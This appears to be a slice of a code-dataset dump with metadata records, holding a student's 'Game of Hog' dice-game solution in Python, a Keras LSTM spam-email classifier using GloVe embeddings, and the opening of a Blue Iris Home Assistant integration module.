"attribute"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.session.pop", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 120, "usage_type": "attribute"}, {"api_name": "oauth2client.client.OAuth2Credentials.from_json", "line_number": 123, "usage_type": "call"}, {"api_name": "oauth2client.client.OAuth2Credentials", "line_number": 123, "usage_type": "attribute"}, {"api_name": "oauth2client.client", "line_number": 123, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 124, "usage_type": "attribute"}, {"api_name": "httplib2.Http", "line_number": 143, "usage_type": "call"}, {"api_name": "apiclient.discovery.build", "line_number": 144, "usage_type": "call"}, {"api_name": "apiclient.discovery", "line_number": 144, "usage_type": "name"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 158, "usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 170, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 173, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 180, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 204, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 204, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 206, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 206, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 211, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 211, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 236, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 266, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 266, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 267, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 273, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 274, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 287, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 287, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 288, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 288, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 288, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 289, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 291, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 294, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 296, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 302, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 303, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 308, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.request.form.getlist", "line_number": 314, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 314, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 314, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 315, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 317, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 318, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 320, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 321, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 322, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 324, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 327, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 336, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 337, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 341, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 345, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 345, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 359, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 362, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 363, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 364, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 368, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 369, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 381, "usage_type": "call"}, {"api_name": "dateutil.tz.tzlocal", "line_number": 381, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 381, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 385, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 396, "usage_type": "call"}, {"api_name": "dateutil.tz.tzlocal", "line_number": 397, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 397, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 399, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 407, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 422, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 423, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 441, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 464, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 510, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 512, "usage_type": "call"}, {"api_name": "arrow.Arrow.span_range", "line_number": 513, "usage_type": "call"}, {"api_name": "arrow.Arrow", "line_number": 513, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 540, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 541, "usage_type": "attribute"}, {"api_name": "arrow.get", "line_number": 542, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 619, "usage_type": "call"}, {"api_name": "arrow.get", "line_number": 627, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 640, "usage_type": "call"}, {"api_name": "CONFIG.DEBUG", "line_number": 641, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 642, "usage_type": "attribute"}, {"api_name": "CONFIG.DEBUG", "line_number": 645, "usage_type": "attribute"}, {"api_name": "CONFIG.PORT", "line_number": 647, "usage_type": "attribute"}, {"api_name": "CONFIG.PORT", "line_number": 650, "usage_type": "attribute"}]} +{"seq_id": "3681538071", "text": "\"\"\"The Game of Hog.\"\"\"\n\nfrom dice import four_sided, six_sided, make_test_dice\nfrom ucb import main, trace, log_current_line, interact\n\nGOAL_SCORE = 100 # The goal of Hog is to score 100 points.\n\n\n######################\n # Simulator #\n######################\n\n\ndef roll_dice(num_rolls, dice=six_sided):\n \"\"\"Simulate rolling the DICE exactly NUM_ROLLS times. Return the sum of\n the outcomes unless any of the outcomes is 1. In that case, return 0.\n \"\"\"\n # These assert statements ensure that num_rolls is a positive integer.\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls > 0, 'Must roll at least once.'\n total = 0\n rolls = 1\n is_one = False\n while rolls <= num_rolls:\n roll = dice()\n total += roll\n rolls += 1\n if roll == 1:\n is_one = True\n if is_one == True:\n return 0\n else:\n return total\n\ndef is_prime(n):\n if n == 0:\n return False\n if n == 1:\n return False\n factor = 2\n while factor < n:\n if n % factor == 0:\n return False\n factor += 1\n return True\n\ndef next_prime(n):\n n = n + 1\n value = True\n while value:\n if is_prime(n) == True:\n return n\n n += 1\n\ndef take_turn(num_rolls, opponent_score, dice=six_sided):\n \"\"\"Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free bacon).\n\n num_rolls: The number of dice rolls that will be made.\n opponent_score: The total score of the opponent.\n dice: A function of no args that returns an integer outcome.\n \"\"\"\n assert type(num_rolls) == int, 'num_rolls must be an integer.'\n assert num_rolls >= 0, 'Cannot roll a negative number of dice.'\n assert num_rolls <= 10, 'Cannot roll more than 10 dice.'\n assert opponent_score < 100, 'The game should be over.'\n score = 0\n opp_dig1 = (opponent_score // 10) % 10\n opp_dig2 = (opponent_score % 10)\n if num_rolls == 0:\n score += 1 + max(opp_dig1, opp_dig2)\n else:\n score += roll_dice(num_rolls, dice)\n if is_prime(score):\n return next_prime(score)\n else:\n return score\n\n\ndef select_dice(score, opponent_score):\n \"\"\"Select six-sided dice unless the sum of SCORE and OPPONENT_SCORE is a\n multiple of 7, in which case select four-sided dice (Hog wild).\n \"\"\"\n if (score + opponent_score) % 7 == 0:\n return four_sided\n else:\n return six_sided\n\n\ndef is_swap(score0, score1):\n \"\"\"Returns whether the last two digits of SCORE0 and SCORE1 are reversed\n versions of each other, such as 19 and 91.\n \"\"\"\n return (score0 // 10) % 10 == (score1 % 10) and (score0 % 10) == (score1 // 10) % 10\n\n\ndef other(who):\n \"\"\"Return the other player, for a player WHO numbered 0 or 1.\n\n >>> other(0)\n 1\n >>> other(1)\n 0\n \"\"\"\n return 1 - who\n\n\ndef play(strategy0, strategy1, score0=0, score1=0, goal=GOAL_SCORE):\n \"\"\"Simulate a game and return the final scores of both players, with\n Player 0's score first, and Player 1's score second.\n\n A strategy is a function that takes two total scores as arguments\n (the current player's score, and the opponent's score), and returns a\n number of dice that the current player will roll this turn.\n\n strategy0: The strategy function for Player 0, who plays first\n strategy1: The strategy function for Player 1, who plays second\n score0 : The starting score for Player 0\n score1 : The starting score for Player 1\n \"\"\"\n who = 0 # Which player is about to take a turn, 0 (first) or 1 (second)\n while score0 < goal and score1 < goal:\n dice = select_dice(score0, score1)\n if who == 0:\n rolls = strategy0(score0, score1)\n turn_score = take_turn(rolls, score1, dice)\n score0 += turn_score\n if turn_score == 0:\n score1 += rolls\n else:\n rolls = strategy1(score1, score0)\n turn_score = take_turn(rolls, score0, dice)\n score1 += turn_score\n if turn_score == 0:\n score0 += rolls\n if is_swap(score0, score1):\n score0, score1 = score1, score0\n who = other(who)\n return score0, score1\n\n\n#######################\n # Strategies #\n#######################\n\n\ndef always_roll(n):\n \"\"\"Return a strategy that always rolls N dice.\n\n A strategy is a function that takes two total scores as arguments\n (the current player's score, and the opponent's score), and returns a\n number of dice that the current player will roll this turn.\n\n >>> strategy = always_roll(5)\n >>> strategy(0, 0)\n 5\n >>> strategy(99, 99)\n 5\n \"\"\"\n def strategy(score, opponent_score):\n return n\n\n return strategy\n\n\n# Experiments\n\ndef make_averaged(fn, num_samples=1000):\n \"\"\"Return a function that returns the average_value of FN when called.\n\n To implement this function, you will have to use *args syntax, a new Python\n feature introduced in this project. See the project description.\n\n >>> dice = make_test_dice(3, 1, 5, 6)\n >>> averaged_dice = make_averaged(dice, 1000)\n >>> averaged_dice()\n 3.75\n >>> make_averaged(roll_dice, 1000)(2, dice)\n 5.5\n\n In this last example, two different turn scenarios are averaged.\n - In the first, the player rolls a 3 then a 1, receiving a score of 0.\n - In the other, the player rolls a 5 and 6, scoring 11.\n Thus, the average value is 5.5.\n Note that the last example uses roll_dice so the hogtimus prime rule does\n not apply.\n \"\"\"\n def average_value(*args):\n sample = 1\n total = 0\n while sample <= num_samples:\n total += fn(*args)\n sample += 1\n return total / num_samples\n return average_value\n\n\ndef max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n \"\"\"Return the number of dice (1 to 10) that gives the highest average turn\n score by calling roll_dice with the provided DICE over NUM_SAMPLES times.\n Assume that dice always return positive outcomes.\n\n >>> dice = make_test_dice(3)\n >>> max_scoring_num_rolls(dice)\n 10\n \"\"\"\n rolls = 1\n num_dice = 1\n old_value = 0\n average_function = make_averaged(roll_dice, num_samples)\n while rolls <= 10:\n new_value = average_function(rolls, dice)\n if old_value < new_value:\n old_value = new_value\n num_dice = rolls\n rolls += 1\n return num_dice\n\n\ndef winner(strategy0, strategy1):\n \"\"\"Return 0 if strategy0 wins against strategy1, and 1 otherwise.\"\"\"\n score0, score1 = play(strategy0, strategy1)\n if score0 > score1:\n return 0\n else:\n return 1\n\n\ndef average_win_rate(strategy, baseline=always_roll(5)):\n \"\"\"Return the average win rate of STRATEGY against BASELINE. Averages the\n winrate when starting the game as player 0 and as player 1.\n \"\"\"\n win_rate_as_player_0 = 1 - make_averaged(winner)(strategy, baseline)\n win_rate_as_player_1 = make_averaged(winner)(baseline, strategy)\n\n return (win_rate_as_player_0 + win_rate_as_player_1) / 2\n\n\ndef run_experiments():\n \"\"\"Run a series of strategy experiments and report results.\"\"\"\n if True: # Change to False when done finding max_scoring_num_rolls\n six_sided_max = max_scoring_num_rolls(six_sided)\n print('Max scoring num rolls for six-sided dice:', six_sided_max)\n four_sided_max = max_scoring_num_rolls(four_sided)\n print('Max scoring num rolls for four-sided dice:', four_sided_max)\n\n if False: # Change to True to test always_roll(8)\n print('always_roll(8) win rate:', average_win_rate(always_roll(8)))\n\n if False: # Change to True to test bacon_strategy\n print('bacon_strategy win rate:', average_win_rate(bacon_strategy))\n\n if False: # Change to True to test swap_strategy\n print('swap_strategy win rate:', average_win_rate(swap_strategy))\n\n \"*** You may add additional experiments as you wish ***\"\n\n\n# Strategies\ndef add_dig(score):\n value = max((score % 10) + 1, ((score // 10) % 10) + 1)\n if is_prime(value):\n value = next_prime(value)\n return value\n\ndef bacon_strategy(score, opponent_score, margin=8, num_rolls=5):\n \"\"\"This strategy rolls 0 dice if that gives at least MARGIN points,\n and rolls NUM_ROLLS otherwise.\n \"\"\"\n new_dig = add_dig(opponent_score)\n if margin <= new_dig:\n return 0\n return num_rolls \n\n\ndef swap_strategy(score, opponent_score, num_rolls=5):\n \"\"\"This strategy rolls 0 dice when it results in a beneficial swap and\n rolls NUM_ROLLS otherwise.\n \"\"\"\n new_dig = add_dig(opponent_score)\n if is_swap(score + new_dig, opponent_score):\n if opponent_score > score + new_dig:\n return 0\n return num_rolls \n\n\ndef final_strategy(score, opponent_score):\n \"\"\"Write a brief description of your final strategy.\n\n First we use the ADD_DIG function to see what score would be added if no dice are rolled.\n The first IF statement will return 4 instead of swapping with 0 if the opponent has a lower score, which guarantees not making a harmful swap.\n Then the swap_strategy is run, followed by the bacon_strategy.\n The next IF statement implements a strategy of rolling 0 dice if the result is the opponent being forced to roll four_sided dice instead of six_sided.\n Lastly if none of the previous strategies are implementable, we will roll 4 dice, since that resulted in the highest success.\n \"\"\"\n new_dig = add_dig(opponent_score)\n if is_swap(score + new_dig, opponent_score) and (score + new_dig) > opponent_score:\n return 4\n if swap_strategy(score, opponent_score, 6) == 0:\n return 0\n if bacon_strategy(score, opponent_score, 6, 6) == 0:\n return 0\n if (new_dig + score + opponent_score) % 7 == 0:\n return 0\n return 4 \n\n\n##########################\n# Command Line Interface #\n##########################\n\n\n# Note: Functions in this section do not need to be changed. They use features\n# of Python not yet covered in the course.\n\n\n@main\ndef run(*args):\n \"\"\"Read in the command-line argument and calls corresponding functions.\n\n This function uses Python syntax/techniques not yet covered in this course.\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description=\"Play Hog\")\n parser.add_argument('--run_experiments', '-r', action='store_true',\n help='Runs strategy experiments')\n\n args = parser.parse_args()\n\n if args.run_experiments:\n run_experiments()\n", "repo_name": "shivmpatel12/samples", "sub_path": "hog.py", "file_name": "hog.py", "file_ext": "py", "file_size_in_byte": 10596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dice.six_sided", "line_number": 14, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 55, "usage_type": "name"}, {"api_name": "dice.four_sided", "line_number": 84, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 86, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 197, "usage_type": "name"}, {"api_name": "dice.six_sided", "line_number": 241, "usage_type": "argument"}, {"api_name": "dice.four_sided", "line_number": 243, "usage_type": "argument"}, {"api_name": "argparse.ArgumentParser", "line_number": 323, "usage_type": "call"}, {"api_name": "ucb.main", "line_number": 316, "usage_type": "name"}]} +{"seq_id": "6648979110", "text": "## for data\r\nimport pandas as pd\r\nimport numpy as np\r\nimport string\r\n## for processing\r\nimport re\r\nfrom keras_preprocessing.sequence import pad_sequences\r\nfrom keras_preprocessing.text import Tokenizer\r\nfrom nltk import word_tokenize\r\nfrom nltk.corpus import stopwords\r\n## for deep learning\r\nfrom sklearn import model_selection\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras import backend as K\r\nfrom tensorflow.keras import Sequential\r\nfrom keras.initializers.initializers_v2 import Constant\r\n\r\n\r\n\r\n#load dataset\r\ndtf = pd.read_csv(\"spam_or_not_spam.csv\") #passing the dataset into a pandas dataframe\r\n\r\n\r\n\r\n## rename columns\r\ndtf = dtf.rename(columns={\"label\":\"y\", \"email\":\"text\"})\r\n\r\n\r\ndtf[\"text\"] = dtf[\"text\"].apply(str)\r\n\r\n\r\n#functions for data preprocessing\r\ndef remove_URL(text):\r\n url = re.compile(r\"https?://\\S+|www\\.\\S+\")\r\n return url.sub(r\"\", text)\r\n\r\n\r\ndef remove_html(text):\r\n html = re.compile(r\"<.*?>\")\r\n return html.sub(r\"\", text)\r\n\r\ndef remove_emoji(string):\r\n emoji_pattern = re.compile(\r\n \"[\"\r\n u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U000024C2-\\U0001F251\"\r\n \"]+\",\r\n flags=re.UNICODE,\r\n )\r\n return emoji_pattern.sub(r\"\", string)\r\n\r\n\r\ndef remove_punct(text):\r\n table = str.maketrans(\"\", \"\", string.punctuation)\r\n return text.translate(table)\r\n\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_URL(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_html(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_emoji(x))\r\ndtf[\"text\"] = dtf.text.map(lambda x: remove_punct(x))\r\n\r\nstop = set(stopwords.words(\"english\"))\r\n\r\n\r\ndef remove_stopwords(text):\r\n text = [word.lower() for word in text.split() if word.lower() not in stop]\r\n\r\n return \" \".join(text)\r\n\r\ndtf[\"text\"] = dtf[\"text\"].map(remove_stopwords)\r\n\r\n#function for corpus creation\r\ndef create_corpus_tk(df):\r\n corpus = []\r\n for text in dtf[\"text\"]:\r\n words = [word.lower() for word in word_tokenize(text)]\r\n corpus.append(words)\r\n return corpus\r\n\r\ncorpus = create_corpus_tk(dtf)\r\nnum_words = len(corpus)\r\n\r\n#dataset split\r\ntrain, test = model_selection.train_test_split(dtf, test_size=0.25)\r\n\r\nmax_len = 50\r\n\r\n#create the vocabulary of indices\r\ntokenizer = Tokenizer(num_words=num_words)\r\ntokenizer.fit_on_texts(train[\"text\"])\r\n\r\n#text to indices\r\ntrain_sequences = tokenizer.texts_to_sequences(train[\"text\"])\r\n\r\n#padding sequences\r\ntrain_padded = pad_sequences(\r\n train_sequences, maxlen=max_len, truncating=\"post\", padding=\"post\"\r\n)\r\n#text to indices\r\ntest_sequences = tokenizer.texts_to_sequences(test[\"text\"])\r\n\r\n#padding sequences\r\ntest_padded = pad_sequences(\r\n test_sequences, maxlen=max_len, padding=\"post\", truncating=\"post\"\r\n)\r\nword_index = tokenizer.word_index\r\n\r\n#creating embedding dictionary\r\nembedding_dict = {}\r\nwith open('glove.6B.100d.txt', encoding=\"utf8\") as f:\r\n for line in f:\r\n values = line.split()\r\n word = values[0]\r\n vectors = np.asarray(values[1:], \"float32\")\r\n embedding_dict[word] = vectors\r\nf.close()\r\n\r\n#initilize embedding matrix\r\nnum_words = len(word_index) + 1\r\nembedding_matrix = np.zeros((num_words, 100))\r\n\r\n#values in embedding matrix\r\nfor word, i in word_index.items():\r\n if i < num_words:\r\n emb_vec = embedding_dict.get(word)\r\n if emb_vec is not None:\r\n embedding_matrix[i] = emb_vec\r\n\r\n\r\n#building LSTM RNN\r\nmodel = Sequential()\r\n\r\nmodel.add(\r\n layers.Embedding(\r\n num_words,\r\n 100,\r\n embeddings_initializer=Constant(embedding_matrix),\r\n input_length=max_len,\r\n trainable=False,\r\n )\r\n)\r\nmodel.add(layers.LSTM(100, dropout=0.1))\r\nmodel.add(layers.Dense(1, activation=\"sigmoid\"))\r\n\r\n#metrics functions\r\ndef recall_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\ndef precision_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision\r\n\r\ndef f1_m(y_true, y_pred):\r\n precision = precision_m(y_true, y_pred)\r\n recall = recall_m(y_true, y_pred)\r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\n\r\n#compile model\r\nmodel.compile(loss=\"binary_crossentropy\", optimizer='adam', metrics=['acc',f1_m,precision_m, recall_m])\r\n\r\n#train model\r\nhistory = model.fit(\r\n train_padded,\r\n train[\"y\"],\r\n epochs=20,\r\n validation_data=(test_padded, test[\"y\"]),\r\n verbose=1,\r\n)\r\n\r\n# evaluate model\r\nloss, accuracy, f1_score, precision, recall = model.evaluate(test_padded, test[\"y\"], verbose=1)\r\nprint('Accuracy: %f' % accuracy)\r\nprint('Precision: %f' % precision)\r\nprint('Recall: %f' % recall)\r\nprint('F1 score: %f' % f1_score)\r\n\r\n\r\n", "repo_name": "katderv/Text-Classification-with-RNN-and-GloVe", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.UNICODE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 58, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 66, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 66, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 88, "usage_type": "name"}, {"api_name": "keras_preprocessing.text.Tokenizer", "line_number": 93, "usage_type": "call"}, {"api_name": "keras_preprocessing.sequence.pad_sequences", "line_number": 100, "usage_type": "call"}, {"api_name": "keras_preprocessing.sequence.pad_sequences", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 138, "usage_type": "name"}, {"api_name": "keras.initializers.initializers_v2.Constant", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 146, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 147, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 151, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 152, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 153, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 157, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.sum", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 158, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.round", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.clip", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 159, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 159, "usage_type": "name"}, {"api_name": "tensorflow.keras.backend.epsilon", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 165, "usage_type": "name"}]} +{"seq_id": "36359493888", "text": "\"\"\"\nSupport for Blue Iris.\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/blueiris/\n\"\"\"\nfrom datetime import datetime\nimport logging\nimport sys\nfrom typing import Optional\n\nfrom cryptography.fernet import InvalidToken\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.entity_registry import EntityRegistry, async_get\nfrom homeassistant.helpers.event import async_call_later, async_track_time_interval\n\nfrom ..api.blue_iris_api import BlueIrisApi\nfrom ..helpers.advanced_configurations_generator import AdvancedConfigurationGenerator\nfrom ..helpers.const import *\nfrom ..models.config_data import ConfigData\nfrom .configuration_manager import ConfigManager\nfrom .device_manager import DeviceManager\nfrom .entity_manager import EntityManager\nfrom .password_manager import PasswordManager\nfrom .storage_manager import StorageManager\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass BlueIrisHomeAssistant:\n def __init__(self, hass: HomeAssistant, password_manager: PasswordManager):\n self._hass = hass\n\n self._remove_async_track_time = None\n\n self._is_initialized = False\n self._is_updating = False\n\n self._entity_registry = None\n\n self._api = None\n self._entity_manager = None\n self._device_manager = None\n self._storage_manager = None\n self._config_generator: Optional[AdvancedConfigurationGenerator] = None\n\n self._config_manager = ConfigManager(password_manager)\n\n @property\n def api(self) -> BlueIrisApi:\n return self._api\n\n @property\n def entity_manager(self) -> EntityManager:\n return self._entity_manager\n\n @property\n def device_manager(self) -> DeviceManager:\n return self._device_manager\n\n @property\n def entity_registry(self) -> EntityRegistry:\n return self._entity_registry\n\n @property\n def config_manager(self) -> ConfigManager:\n return self._config_manager\n\n @property\n def storage_manager(self) -> 